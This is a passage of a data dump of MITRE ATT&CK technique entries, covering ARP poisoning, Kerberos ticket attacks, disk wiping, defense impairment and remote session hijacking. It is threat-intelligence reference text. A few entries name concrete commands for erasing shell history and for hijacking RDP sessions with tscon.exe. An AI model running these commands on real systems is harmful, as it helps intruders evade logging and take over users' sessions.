               'name': 'LLMNR/NBT-NS Poisoning and SMB Relay',
               'platforms': ['Windows']},
 'T1557.002': {'attack_id': 'T1557.002',
               'categories': ['credential-access', 'collection'],
               'description': 'Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves '
                              'between the communication of two or more networked devices. This activity may be used '
                              'to enable follow-on behaviors such as [Network '
                              'Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data '
                              'Manipulation](https://attack.mitre.org/techniques/T1565/002).\n'
                              '\n'
                              'The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a '
                              'media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network '
                              'segment communicate with each other by using link layer addresses. If a networked '
                              'device does not have the link layer address of a particular networked device, it may '
                              'send out a broadcast ARP request to the local network to translate the IP address to a '
                              'MAC address. The device with the associated IP address directly replies with its MAC '
                              'address. The networked device that made the ARP request will then use as well as store '
                              'that information in its ARP cache.\n'
                              '\n'
                              'An adversary may passively wait for an ARP request to poison the ARP cache of the '
                              'requesting device. The adversary may reply with their MAC address, thus deceiving the '
                              'victim by making them believe that they are communicating with the intended networked '
                              'device. For the adversary to poison the ARP cache, their reply must be faster than the '
                              'one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP '
                              'reply that maliciously announces the ownership of a particular IP address to all the '
                              'devices in the local network segment.\n'
                              '\n'
                              'The ARP protocol is stateless and does not require authentication. Therefore, devices '
                              'may wrongly add or update the MAC address of the IP address in their ARP '
                              'cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n'
                              '\n'
                              'Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network '
                              'traffic. This activity may be used to collect and/or relay data such as credentials, '
                              'especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP '
                              'Spoofing Aug 2003)\n',
               'name': 'ARP Cache Poisoning',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1558': {'attack_id': 'T1558',
           'categories': ['credential-access'],
           'description': 'Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos '
                          'tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). \n'
                          '\n'
                          'Kerberos is an authentication protocol widely used in modern Windows domain environments. '
                          'In Kerberos environments, referred to as “realms”, there are three basic participants: '
                          'client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring '
                          'Decoder) Clients request access to a service and through the exchange of Kerberos tickets, '
                          'originating from KDC, they are granted access after having successfully authenticated. The '
                          'KDC is responsible for both authentication and ticket granting.  Attackers may attempt to '
                          'abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.',
           'name': 'Steal or Forge Kerberos Tickets',
           'platforms': ['Windows']},
 'T1558.001': {'attack_id': 'T1558.001',
               'categories': ['credential-access'],
               'description': 'Adversaries who have the KRBTGT account password hash may forge Kerberos '
                              'ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity '
                              'Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication '
                              'material for any account in Active Directory.(Citation: CERT-EU Golden Ticket '
                              'Protection) \n'
                              '\n'
                              'Using a golden ticket, adversaries are then able to request ticket granting service '
                              '(TGS) tickets, which enable access to specific resources. Golden tickets require '
                              'adversaries to interact with the Key Distribution Center (KDC) in order to obtain '
                              'TGS.(Citation: ADSecurity Detecting Forged Tickets)\n'
                              '\n'
                              'The KDC service runs all on domain controllers that are part of an Active Directory '
                              'domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is '
                              'responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity '
                              'Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential '
                              'Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain '
                              'controller.',
               'name': 'Golden Ticket',
               'platforms': ['Windows']},
 'T1558.002': {'attack_id': 'T1558.002',
               'categories': ['credential-access'],
               'description': 'Adversaries who have the password hash of a target service account (e.g. SharePoint, '
                              'MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver '
                              'tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity '
                              'Silver Tickets)\n'
                              '\n'
                              'Silver tickets are more limited in scope in than golden tickets in that they only '
                              'enable adversaries to access a particular resource (e.g. MSSQL) and the system that '
                              'hosts the resource; however, unlike golden tickets, adversaries with the ability to '
                              'forge silver tickets are able to create TGS tickets without interacting with the Key '
                              'Distribution Center (KDC), potentially making detection more difficult.(Citation: '
                              'ADSecurity Detecting Forged Tickets)\n'
                              '\n'
                              'Password hashes for target services may be obtained using [OS Credential '
                              'Dumping](https://attack.mitre.org/techniques/T1003) or '
                              '[Kerberoasting](https://attack.mitre.org/techniques/T1558/003).',
               'name': 'Silver Ticket',
               'platforms': ['Windows']},
 'T1558.003': {'attack_id': 'T1558.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network '
                              'traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to '
                              '[Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire '
                              'InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n'
                              '\n'
                              'Service principal names (SPNs) are used to uniquely identify each instance of a Windows '
                              'service. To enable authentication, Kerberos requires that SPNs be associated with at '
                              'least one service logon account (an account specifically tasked with running a '
                              'service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft '
                              'SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: '
                              'Harmj0y Kerberoast Nov 2016)\n'
                              '\n'
                              'Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or '
                              'more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain '
                              'controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity '
                              'Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 '
                              'algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account '
                              'associated with the SPN is used as the private key and is thus vulnerable to offline '
                              '[Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose '
                              'plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: '
                              'Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n'
                              '\n'
                              'This same attack could be executed using service tickets captured from network '
                              'traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n'
                              '\n'
                              'Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), '
                              '[Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral '
                              'Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos '
                              'Nov 2014)',
               'name': 'Kerberoasting',
               'platforms': ['Windows']},
 'T1558.004': {'attack_id': 'T1558.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may reveal credentials of accounts that have disabled Kerberos '
                              'preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) '
                              'Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n'
                              '\n'
                              'Preauthentication offers protection against offline [Password '
                              'Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user '
                              'requesting access to a resource initiates communication with the Domain Controller (DC) '
                              'by sending an Authentication Server Request (AS-REQ) message with a timestamp that is '
                              'encrypted with the hash of their password. If and only if the DC is able to '
                              'successfully decrypt the timestamp with the hash of the user’s password, it will then '
                              'send an Authentication Server Response (AS-REP) message that contains the Ticket '
                              'Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s '
                              'password.(Citation: Microsoft Kerberos Preauth 2014)\n'
                              '\n'
                              'For each account found without preauthentication, an adversary may send an AS-REQ '
                              'message without the encrypted timestamp and receive an AS-REP message with TGT data '
                              'which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted '
                              'data may be vulnerable to offline [Password '
                              'Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to '
                              '[Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext '
                              'credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits '
                              'Cracking AS-REP Roasting Jun 2019) \n'
                              '\n'
                              'An account registered to a domain, with or without special privileges, can be abused to '
                              'list all domain accounts that have preauthentication disabled by utilizing Windows '
                              'tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP '
                              'filter. Alternatively, the adversary may send an AS-REQ message for each user. If the '
                              'DC responds without errors, the account does not require preauthentication and the '
                              'AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting '
                              'AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n'
                              '\n'
                              'Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), '
                              '[Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral '
                              'Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos '
                              'Nov 2014)',
               'name': 'AS-REP Roasting',
               'platforms': ['Windows']},
 'T1559': {'attack_id': 'T1559',
           'categories': ['execution'],
           'description': 'Adversaries may abuse inter-process communication (IPC) mechanisms for local code or '
                          'command execution. IPC is typically used by processes to share data, communicate with each '
                          'other, or synchronize execution. IPC is also commonly used to avoid situations such as '
                          'deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n'
                          '\n'
                          'Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ '
                          'depending on OS, but typically exists in a form accessible through programming '
                          'languages/libraries or native interfaces such as Windows [Dynamic Data '
                          'Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object '
                          'Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such '
                          'as those of [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC '
                          'mechanisms.',
           'name': 'Inter-Process Communication',
           'platforms': ['Windows']},
 'T1559.001': {'attack_id': 'T1559.001',
               'categories': ['execution'],
               'description': 'Adversaries may use the Windows Component Object Model (COM) for local code execution. '
                              'COM is an inter-process communication (IPC) component of the native Windows application '
                              'programming interface (API) that enables interaction between software objects, or '
                              'executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM '
                              'June 2019) Through COM, a client object can call methods of server objects, which are '
                              'typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft '
                              'COM)\n'
                              '\n'
                              'Various COM interfaces are exposed that can be abused to invoke arbitrary execution via '
                              'a variety of programming languages such as C, C++, Java, and [Visual '
                              'Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) '
                              'Specific COM objects also exist to directly perform functions beyond code execution, '
                              'such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), '
                              'fileless download/execution, and other adversary behaviors related to privilege '
                              'escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: '
                              'ProjectZero File Write EoP Apr 2018)',
               'name': 'Component Object Model',
               'platforms': ['Windows']},
 'T1559.002': {'attack_id': 'T1559.002',
               'categories': ['execution'],
               'description': 'Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. '
                              'DDE is a client-server protocol for one-time and/or continuous inter-process '
                              'communication (IPC) between applications. Once a link is established, applications can '
                              'autonomously exchange transactions consisting of strings, warm data links '
                              '(notifications when a data item changes), hot data links (duplications of changes to a '
                              'data item), and requests for command execution.\n'
                              '\n'
                              'Object Linking and Embedding (OLE), or the ability to link data between documents, was '
                              'originally implemented through DDE. Despite being superseded by [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 '
                              'and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE '
                              'Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: '
                              'Microsoft DDE Advisory Nov 2017)\n'
                              '\n'
                              'Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS '
                              'DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files '
                              '(Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, '
                              'avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost '
                              'MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a '
                              'compromised machine who does not have direct access to a [Command and Scripting '
                              'Interpreter](https://attack.mitre.org/techniques/T1059).',
               'name': 'Dynamic Data Exchange',
               'platforms': ['Windows']},
 'T1560': {'attack_id': 'T1560',
           'categories': ['collection'],
           'description': 'An adversary may compress and/or encrypt data that is collected prior to exfiltration. '
                          'Compressing the data can help to obfuscate the collected data and minimize the amount of '
                          'data sent over the network. Encryption can be used to hide information that is being '
                          'exfiltrated from detection or make exfiltration less conspicuous upon inspection by a '
                          'defender.\n'
                          '\n'
                          'Both compression and encryption are done prior to exfiltration, and can be performed using '
                          'a utility, 3rd party library, or custom method.',
           'name': 'Archive Collected Data',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1560.001': {'attack_id': 'T1560.001',
               'categories': ['collection'],
               'description': 'An adversary may compress or encrypt data that is collected prior to exfiltration using '
                              '3rd party utilities. Many utilities exist that can archive data, including '
                              '7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: '
                              'WinZip Homepage). Most utilities include functionality to encrypt and/or compress '
                              'data.\n'
                              '\n'
                              'Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` '
                              'on Windows systems.',
               'name': 'Archive via Utility',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1560.002': {'attack_id': 'T1560.002',
               'categories': ['collection'],
               'description': 'An adversary may compress or encrypt data that is collected prior to exfiltration using '
                              '3rd party libraries. Many libraries exist that can archive data, including '
                              '[Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), '
                              'libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include '
                              'functionality to encrypt and/or compress data.\n'
                              '\n'
                              'Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, '
                              'and zip on Windows. Note that the libraries are different from the utilities. The '
                              'libraries can be linked against when compiling, while the utilities require spawning a '
                              'subshell, or a similar execution mechanism.',
               'name': 'Archive via Library',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1560.003': {'attack_id': 'T1560.003',
               'categories': ['collection'],
               'description': 'An adversary may compress or encrypt data that is collected prior to exfiltration using '
                              'a custom method. Adversaries may choose to use custom archival methods, such as '
                              'encryption with XOR or stream ciphers implemented with no external library or utility '
                              'references. Custom implementations of well-known compression algorithms have also been '
                              'used.(Citation: ESET Sednit Part 2)',
               'name': 'Archive via Custom Method',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1561': {'attack_id': 'T1561',
           'categories': ['impact'],
           'description': 'Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a '
                          'network to interrupt availability to system and network resources. With direct write access '
                          'to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt '
                          'to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot '
                          'record (MBR). A complete wipe of all disk sectors may be attempted.\n'
                          '\n'
                          'To maximize impact on the target organization in operations where network-wide availability '
                          'interruption is the goal, malware used for wiping disks may have worm-like features to '
                          'propagate across a network by leveraging additional techniques like [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                          'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                          'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster '
                          'Destructive Malware)',
           'name': 'Disk Wipe',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1561.001': {'attack_id': 'T1561.001',
               'categories': ['impact'],
               'description': 'Adversaries may erase the contents of storage devices on specific systems or in large '
                              'numbers in a network to interrupt availability to system and network resources.\n'
                              '\n'
                              'Adversaries may partially or completely overwrite the contents of a storage device '
                              'rendering the data irrecoverable through the storage interface.(Citation: Novetta '
                              'Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus '
                              'Sony 2018) Instead of wiping specific disk structures or files, adversaries with '
                              'destructive intent may wipe arbitrary portions of disk content. To wipe disk content, '
                              'adversaries may acquire direct access to the hard drive in order to overwrite '
                              'arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster '
                              'Destructive Malware) Adversaries have been observed leveraging third-party drivers like '
                              '[RawDisk](https://attack.mitre.org/software/S0364) to directly access disk '
                              'content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive '
                              'Malware) This behavior is distinct from [Data '
                              'Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk '
                              'are erased instead of individual files.\n'
                              '\n'
                              'To maximize impact on the target organization in operations where network-wide '
                              'availability interruption is the goal, malware used for wiping disk content may have '
                              'worm-like features to propagate across a network by leveraging additional techniques '
                              'like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential '
                              'Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster '
                              'Destructive Malware)',
               'name': 'Disk Content Wipe',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1561.002': {'attack_id': 'T1561.002',
               'categories': ['impact'],
               'description': 'Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to '
                              'boot a system; targeting specific critical systems or in large numbers in a network to '
                              'interrupt availability to system and network resources. \n'
                              '\n'
                              'Adversaries may attempt to render the system unable to boot by overwriting critical '
                              'data located in structures such as the master boot record (MBR) or partition '
                              'table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: '
                              'Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 '
                              'Shamoon3 2018) The data contained in disk structures may include the initial executable '
                              'code for loading an operating system or the location of the file system partitions on '
                              'disk. If this information is not present, the computer will not be able to load an '
                              'operating system during the boot process, leaving the computer unavailable. [Disk '
                              'Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in '
                              'isolation, or along with [Disk Content '
                              'Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are '
                              'wiped.\n'
                              '\n'
                              'To maximize impact on the target organization, malware designed for destroying disk '
                              'structures may have worm-like features to propagate across a network by leveraging '
                              'other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS '
                              'Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon '
                              '2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov '
                              '2016)(Citation: Kaspersky StoneDrill 2017)',
               'name': 'Disk Structure Wipe',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1562': {'attack_id': 'T1562',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may maliciously modify components of a victim environment in order to hinder or '
                          'disable defensive mechanisms. This not only involves impairing preventative defenses, such '
                          'as firewalls and anti-virus, but also detection capabilities that defenders can use to '
                          'audit activity and identify malicious behavior. This may also span both native defenses as '
                          'well as supplemental capabilities installed by users and administrators.\n'
                          '\n'
                          'Adversaries could also target event aggregation and analysis mechanisms, or otherwise '
                          'disrupt these procedures by altering other system components.',
           'name': 'Impair Defenses',
           'platforms': ['Linux', 'Windows', 'macOS', 'AWS', 'GCP', 'Azure']},
 'T1562.001': {'attack_id': 'T1562.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may disable security tools to avoid possible detection of their tools and '
                              'activities. This can take the form of killing security software or event logging '
                              'processes, deleting Registry keys so that tools do not start at run time, or other '
                              'methods to interfere with security tools scanning or reporting information.',
               'name': 'Disable or Modify Tools',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1562.002': {'attack_id': 'T1562.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may disable Windows event logging to limit data that can be leveraged for '
                              'detections and audits. Windows event logs record user and system activity such as login '
                              'attempts, process creation, and much more.(Citation: Windows Log Events) This data is '
                              'used by security tools and analysts to generate detections.\n'
                              '\n'
                              'Adversaries may targeting system-wide logging or just that of a particular application. '
                              'By disabling Windows event logging, adversaries can operate while leaving less evidence '
                              'of a compromise behind.',
               'name': 'Disable Windows Event Logging',
               'platforms': ['Windows']},
 'T1562.003': {'attack_id': 'T1562.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may impair command history logging to hide commands they run on a '
                              'compromised system. Various command interpreters keep track of the commands users type '
                              "in their terminal so that users can retrace what they've done. \n"
                              '\n'
                              'On Linux and macOS, command history is tracked in a file pointed to by the environment '
                              'variable <code>HISTFILE</code>. When a user logs off a system, this information is '
                              "flushed to a file in the user's home directory called <code>~/.bash_history</code>. The "
                              '<code>HISTCONTROL</code> environment variable keeps track of what should be saved by '
                              'the <code>history</code> command and eventually into the <code>~/.bash_history</code> '
                              'file when a user logs out. <code>HISTCONTROL</code> does not exist by default on macOS, '
                              'but can be set by the user and will be respected.\n'
                              '\n'
                              'Adversaries may clear the history environment variable (<code>unset HISTFILE</code>) or '
                              'set the command history size to zero (<code>export HISTFILESIZE=0</code>) to prevent '
                              'logging of commands. Additionally, <code>HISTCONTROL</code> can be configured to ignore '
                              'commands that start with a space by simply setting it to "ignorespace". '
                              '<code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to '
                              '"ignoredups". In some Linux systems, this is set by default to "ignoreboth" which '
                              'covers both of the previous examples. This means that ”ls” will not be saved, but ”ls” '
                              'would be saved by history. Adversaries can abuse this to operate without leaving traces '
                              'by simply prepending a space to all of their terminal commands.\n'
                              '\n'
                              'On Windows systems, the <code>PSReadLine</code> module tracks commands used in all '
                              'PowerShell sessions and writes them to a file '
                              '(<code>$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt</code> '
                              'by default). Adversaries may change where these logs are saved using '
                              '<code>Set-PSReadLineOption -HistorySavePath {File Path}</code>. This will cause '
                              '<code>ConsoleHost_history.txt</code> to stop receiving logs. Additionally, it is '
                              'possible to turn off logging to this file using the PowerShell command '
                              '<code>Set-PSReadlineOption -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft '
                              'PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos '
                              'PowerShell Command History Forensics)',
               'name': 'Impair Command History Logging',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1562.004': {'attack_id': 'T1562.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may disable or modify system firewalls in order to bypass controls limiting '
                              'network usage. Changes could be disabling the entire mechanism as well as adding, '
                              'deleting, or modifying particular rules. This can be done numerous ways depending on '
                              'the operating system, including via command-line, editing Windows Registry keys, and '
                              'Windows Control Panel.\n'
                              '\n'
                              'Modifying or disabling a system firewall may enable adversary C2 communications, '
                              'lateral movement, and/or data exfiltration that would otherwise not be allowed. ',
               'name': 'Disable or Modify System Firewall',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1562.006': {'attack_id': 'T1562.006',
               'categories': ['defense-evasion'],
               'description': 'An adversary may attempt to block indicators or events typically captured by sensors '
                              'from being gathered and analyzed. This could include maliciously redirecting (Citation: '
                              'Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing '
                              'for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings '
                              'that control the collection and flow of event telemetry. (Citation: Medium Event '
                              'Tracing Tampering 2018) These settings may be stored on the system in configuration '
                              'files and/or in the Registry as well as being accessible via administrative utilities '
                              'such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows '
                              'Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n'
                              '\n'
                              'ETW interruption can be achieved multiple ways, however most directly by defining '
                              'conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) '
                              '<code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry '
                              'to make alterations.\n'
                              '\n'
                              'In the case of network-based reporting of indicators, an adversary may block traffic '
                              'associated with reporting to prevent central analysis. This may be accomplished by many '
                              'means, such as stopping a local process responsible for forwarding telemetry and/or '
                              'creating a host-based firewall rule to block traffic to specific hosts responsible for '
                              'aggregating events, such as security information and event management (SIEM) products. ',
               'name': 'Indicator Blocking',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1562.007': {'attack_id': 'T1562.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may disable or modify a firewall within a cloud environment to bypass '
                              'controls that limit access to cloud resources. Cloud firewalls are separate from system '
                              'firewalls that are described in [Disable or Modify System '
                              'Firewall](https://attack.mitre.org/techniques/T1562/004). \n'
                              '\n'
                              'Cloud environments typically utilize restrictive security groups and firewall rules '
                              'that only allow network activity from trusted IP addresses via expected ports and '
                              'protocols. An adversary may introduce new firewall rules or policies to allow access '
                              'into a victim cloud environment. For example, an adversary may use a script or utility '
                              'that creates new ingress rules in existing security groups to allow any TCP/IP '
                              'connectivity.(Citation: Expel IO Evil in AWS)\n'
                              '\n'
                              'Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral '
                              'movement, and/or data exfiltration that would otherwise not be allowed.',
               'name': 'Disable or Modify Cloud Firewall',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1562.008': {'attack_id': 'T1562.008',
               'categories': ['defense-evasion'],
               'description': 'An adversary may disable cloud logging capabilities and integrations to limit what data '
                              'is collected on their activities and avoid detection. \n'
                              '\n'
                              'Cloud environments allow for collection and analysis of audit and application logs that '
                              'provide insight into what activities a user does within the environment. If an attacker '
                              'has sufficient permissions, they can disable logging to avoid detection of their '
                              'activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail '
                              'integrations prior to conducting further malicious activity.(Citation: Following the '
                              'CloudTrail: Generating strong AWS security signals with Sumo Logic)',
               'name': 'Disable Cloud Logs',
               'platforms': ['GCP', 'Azure', 'AWS']},
 'T1563': {'attack_id': 'T1563',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may take control of preexisting sessions with remote services to move laterally '
                          'in an environment. Users may use valid credentials to log into a service specifically '
                          'designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into '
                          'a service, a session will be established that will allow them to maintain a continuous '
                          'interaction with that service.\n'
                          '\n'
                          'Adversaries may commandeer these sessions to carry out actions on remote systems. [Remote '
                          'Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of '
                          '[Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing '
                          'session rather than creating a new session using [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking '
                          'Medium)(Citation: Breach Post-mortem SSH Hijack)',
           'name': 'Remote Service Session Hijacking',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1563.001': {'attack_id': 'T1563.001',
               'categories': ['lateral-movement'],
               'description': "Adversaries may hijack a legitimate user's SSH session to move laterally within an "
                              'environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS '
                              'systems. It allows a user to connect to another system via an encrypted tunnel, '
                              'commonly authenticating through a password, certificate or the use of an asymmetric '
                              'encryption key pair.\n'
                              '\n'
                              'In order to move laterally from a compromised host, adversaries may take advantage of '
                              'trust relationships established with other systems via public key authentication in '
                              'active SSH sessions by hijacking an existing connection to another system. This may '
                              "occur through compromising the SSH agent itself or by having access to the agent's "
                              'socket. If an adversary is able to obtain root access, then hijacking SSH sessions is '
                              'likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: '
                              'Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n'
                              '\n'
                              '[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of '
                              '[SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH '
                              'session rather than creating a new session using [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078).',
               'name': 'SSH Hijacking',
               'platforms': ['Linux', 'macOS']},
 'T1563.002': {'attack_id': 'T1563.002',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may hijack a legitimate user’s remote desktop session to move laterally '
                              'within an environment. Remote desktop is a common feature in operating systems. It '
                              'allows a user to log into an interactive session with a system desktop graphical user '
                              'interface on a remote system. Microsoft refers to its implementation of the Remote '
                              'Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote '
                              'Desktop Services)\n'
                              '\n'
                              'Adversaries may perform RDP session hijacking which involves stealing a legitimate '
                              "user's remote session. Typically, a user is notified when someone else is trying to "
                              'steal their session. With System permissions and using Terminal Services Console, '
                              '`c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can '
                              'hijack a session without the need for credentials or prompts to the user.(Citation: RDP '
                              'Hijacking Korznikov) This can be done remotely or locally and with active or '
                              'disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote '
                              'System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation '
                              'by stealing a Domain Admin or higher privileged account session. All of this can be '
                              'done by using native Windows commands, but it has also been added as a feature in red '
                              'teaming tools.(Citation: Kali Redsnarf)',
               'name': 'RDP Hijacking',
               'platforms': ['Windows']},
 'T1564': {'attack_id': 'T1564',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to hide artifacts associated with their behaviors to evade '
                          'detection. Operating systems may have features to hide various artifacts, such as important '
                          'system files and administrative task execution, to avoid disrupting user work environments '
